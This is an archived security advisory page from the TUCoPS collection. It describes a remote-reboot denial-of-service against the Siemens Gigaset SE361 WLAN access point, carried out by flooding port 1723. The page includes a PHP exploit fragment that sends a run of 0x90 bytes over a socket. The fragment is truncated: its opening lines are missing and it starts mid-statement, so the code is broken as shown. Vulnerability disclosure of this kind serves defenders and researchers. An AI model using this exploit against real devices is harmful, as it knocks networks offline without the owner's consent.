TUCoPS :: Network Appliances :: bt-21635.htm

Siemens Gigaset SE361 Wlan - Remote Reboot
Siemens Gigaset SE361 Wlan - Remote Reboot
Siemens Gigaset SE361 Wlan - Remote Reboot



Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.
It takes a few bytes for the AP to automatically restart

\n";
} else {
    $trash = str_repeat("\x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash \r\n";
    }
    fclose($con);
}
?> 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH